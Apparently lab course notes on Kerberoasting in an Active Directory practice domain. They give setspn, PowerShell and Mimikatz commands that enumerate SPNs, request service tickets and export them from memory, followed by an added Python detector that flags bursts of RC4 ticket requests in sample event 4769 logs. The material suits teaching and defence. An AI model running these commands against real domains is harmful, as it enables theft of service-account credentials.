Semi Manual method

Let's begin with the built-in setspn binary to enumerate SPNs in the domain.

setspn.exe

setspn.exe -Q */*

Using PowerShell, we can request TGS tickets for an account from the shell above and load them into memory. Once they are in memory, we can extract them with Mimikatz. Let's try this by targeting a single user:

Add-Type -AssemblyName System.IdentityModel
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "MSSQLSvc/DEV-PRE-SQL.inlanefreight.local:1433"

Let's break down the commands above to see what we are doing (this is essentially what Rubeus does with its default Kerberoasting method):

We can also choose to retrieve all tickets using the same method, but this will also pull all computer accounts, so it is not optimal.

Retrieving All Tickets Using setspn.exe

setspn.exe -T INLANEFREIGHT.LOCAL -Q */* | Select-String '^CN' -Context 0,1 | % { New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList $_.Context.PostContext[0].Trim() }

Extracting Tickets from Memory with Mimikatz

base64 /out:true
kerberos::list /export

<base64 blob output>

If we do not specify the base64 /out:true command, Mimikatz will extract the tickets and write them to .kirbi files.
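From the defender's side, each TGS request issued above is recorded on the domain controller as Security event 4769, and a burst of RC4-encrypted (type 0x17) service tickets for many distinct user service accounts from one principal is the footprint of the enumeration shown. The following added example (not from the original notes) runs that check over constructed, simplified 4769 records; the pipe-delimited line layout and all account names are assumptions for illustration, not the real event format.

```python
from collections import defaultdict

# Constructed sample lines shaped like Security event 4769 (Kerberos service
# ticket request): account, Service Name (account owning the SPN), Ticket
# Encryption Type, Failure Code. 0x17 = RC4-HMAC, 0x12 = AES256, 0x0 = success.
SAMPLE_4769_LOG = """\
4769|jsmith@INLANEFREIGHT.LOCAL|sqldev|0x17|0x0
4769|jsmith@INLANEFREIGHT.LOCAL|svc_backup|0x17|0x0
4769|jsmith@INLANEFREIGHT.LOCAL|DC01$|0x17|0x0
4769|jsmith@INLANEFREIGHT.LOCAL|svc_web|0x17|0x0
4769|alice@INLANEFREIGHT.LOCAL|sqldev|0x17|0x0
4769|bob@INLANEFREIGHT.LOCAL|sqldev|0x12|0x0
4769|bob@INLANEFREIGHT.LOCAL|svc_backup|0x12|0x0
4769|bob@INLANEFREIGHT.LOCAL|svc_web|0x12|0x0
4769|carol@INLANEFREIGHT.LOCAL|svc_web|0x17|0x1b
"""
RC4_HMAC = "0x17"

def parse_records(log_text):
    """Split pipe-delimited 4769 lines into dicts; skip malformed or non-4769 lines."""
    records = []
    for line in log_text.splitlines():
        fields = line.strip().split("|")
        if len(fields) != 5 or fields[0] != "4769":
            continue
        _, account, service, etype, status = fields
        records.append({"account": account, "service": service,
                        "etype": etype.lower(), "status": status.lower()})
    return records

def rc4_services_by_account(records):
    """Map each account to the user service accounts it got successful RC4 tickets for.
    Computer accounts (Service Name ending in '$') are dropped as noise."""
    by_account = defaultdict(set)
    for r in records:
        if r["etype"] != RC4_HMAC or r["status"] != "0x0" or r["service"].endswith("$"):
            continue
        by_account[r["account"]].add(r["service"])
    return by_account

def flag_kerberoast_candidates(records, threshold=3):
    """Return {account: sorted services} for accounts meeting the threshold."""
    return {acct: sorted(svcs)
            for acct, svcs in rc4_services_by_account(records).items()
            if len(svcs) >= threshold}

if __name__ == "__main__":
    for acct, svcs in flag_kerberoast_candidates(parse_records(SAMPLE_4769_LOG)).items():
        print(f"{acct}: RC4 tickets for {len(svcs)} services: {', '.join(svcs)}")
```

Tune the threshold and time window to your environment; the bulk request in the setspn pipeline above hits every SPN-bearing account within seconds, which is far outside normal user behaviour.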